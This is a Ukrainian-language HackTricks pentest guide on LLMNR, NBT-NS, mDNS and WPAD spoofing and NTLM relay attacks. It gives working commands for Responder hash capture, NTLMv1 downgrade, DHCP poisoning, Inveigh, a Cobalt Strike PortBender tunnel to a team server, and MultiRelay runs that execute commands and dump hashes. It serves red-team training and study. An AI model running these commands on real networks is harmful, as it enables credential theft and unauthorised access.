HackTricksСпуфінг LLMNR, NBT-NS, mDNS/DNS та WPAD і атаки реле
Reading time: 6 minutes
tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Мережеві протоколи
Протоколи локального розв'язання імен
- LLMNR, NBT-NS та mDNS:
- Microsoft та інші операційні системи використовують LLMNR та NBT-NS для локального розв'язання імен, коли DNS не працює. Аналогічно, системи Apple та Linux використовують mDNS.
- Ці протоколи підлягають перехопленню та спуфінгу через їхню неавтентифіковану, широкомовну природу через UDP.
- Responder може бути використаний для імітації сервісів, надсилаючи підроблені відповіді до хостів, які запитують ці протоколи.
- Додаткову інформацію про імітацію сервісів за допомогою Responder можна знайти тут.
Протокол автоматичного виявлення веб-проксі (WPAD)
- WPAD дозволяє браузерам автоматично виявляти налаштування проксі.
- Виявлення здійснюється через DHCP, DNS або повернення до LLMNR та NBT-NS, якщо DNS не працює.
- Responder може автоматизувати атаки WPAD, направляючи клієнтів до шкідливих WPAD-серверів.
Responder для отруєння протоколів
- Responder - це інструмент, що використовується для отруєння запитів LLMNR, NBT-NS та mDNS, вибірково відповідаючи на основі типів запитів, переважно націлюючись на SMB-сервіси.
- Він попередньо встановлений у Kali Linux, налаштовується за адресою
/etc/responder/Responder.conf. - Responder відображає захоплені хеші на екрані та зберігає їх у каталозі
/usr/share/responder/logs. - Він підтримує як IPv4, так і IPv6.
- Версія Responder для Windows доступна тут.
Запуск Responder
- Щоб запустити Responder з налаштуваннями за замовчуванням:
responder -I <Interface> - Для більш агресивного прослуховування (з потенційними побічними ефектами):
responder -I <Interface> -P -r -v - Техніки для захоплення NTLMv1 викликів/відповідей для легшого злому:
responder -I <Interface> --lm --disable-ess - Імітацію WPAD можна активувати за допомогою:
responder -I <Interface> --wpad - Запити NetBIOS можуть бути вирішені на IP-адресу атакуючого, і можна налаштувати проксі для аутентифікації:
responder.py -I <interface> -Pv
Отруєння DHCP за допомогою Responder
- Спуфінг відповідей DHCP може назавжди отруїти маршрутизаційну інформацію жертви, пропонуючи більш прихований варіант, ніж отруєння ARP.
- Це вимагає точного знання конфігурації цільової мережі.
- Запуск атаки:
./Responder.py -I eth0 -Pdv - Цей метод може ефективно захоплювати NTLMv1/2 хеші, але вимагає обережного поводження, щоб уникнути порушення мережі.
Захоплення облікових даних за допомогою Responder
- Responder буде імітувати сервіси, використовуючи вищезгадані протоколи, захоплюючи облікові дані (зазвичай NTLMv2 Challenge/Response), коли користувач намагається аутентифікуватися проти спуфлених сервісів.
- Можна спробувати знизити до NetNTLMv1 або відключити ESS для легшого злому облікових даних.
Важливо зазначити, що використання цих технік повинно здійснюватися законно та етично, забезпечуючи належну авторизацію та уникаючи порушення або несанкціонованого доступу.
Inveigh
Inveigh - це інструмент для тестувальників на проникнення та червоних команд, розроблений для систем Windows. Він пропонує функціональність, подібну до Responder, виконуючи спуфінг та атаки "людина посередині". Інструмент еволюціонував з PowerShell-скрипта до бінарного файлу C#, з Inveigh та InveighZero як основними версіями. Докладні параметри та інструкції можна знайти в вікі.
Inveigh можна запускати через PowerShell:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
Або виконано як бінарний файл C#:
Inveigh.exe
NTLM Relay Attack
Ця атака використовує сесії аутентифікації SMB для доступу до цільової машини, надаючи системну оболонку у разі успіху. Основні передумови включають:
- Аутентифікований користувач повинен мати доступ Local Admin на переданому хості.
- Підписування SMB повинно бути вимкнено.
445 Port Forwarding and Tunneling
У сценаріях, де безпосереднє введення в мережу неможливе, трафік на порту 445 потрібно перенаправити та тунелювати. Інструменти, такі як PortBender, допомагають перенаправити трафік порту 445 на інший порт, що є необхідним, коли доступ Local Admin доступний для завантаження драйверів.
PortBender setup and operation in Cobalt Strike:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
Інші інструменти для атаки NTLM Relay
- Metasploit: Налаштування з проксі, деталями локального та віддаленого хостів.
- smbrelayx: Скрипт на Python для релеювання SMB-сесій та виконання команд або розгортання бекдорів.
- MultiRelay: Інструмент з набору Responder для релеювання конкретних користувачів або всіх користувачів, виконання команд або вивантаження хешів.
Кожен інструмент можна налаштувати для роботи через SOCKS-проксі, якщо це необхідно, що дозволяє проводити атаки навіть з непрямим доступом до мережі.
Операція MultiRelay
MultiRelay виконується з директорії /usr/share/responder/tools, націлюючись на конкретні IP-адреси або користувачів.
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
Ці інструменти та техніки формують всебічний набір для проведення атак NTLM Relay в різних мережевих середовищах.
Примус NTLM Логінів
У Windows ви можете примусити деякі привілейовані облікові записи автентифікуватися на довільних машинах. Прочитайте наступну сторінку, щоб дізнатися як:
Force NTLM Privileged Authentication
Посилання
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.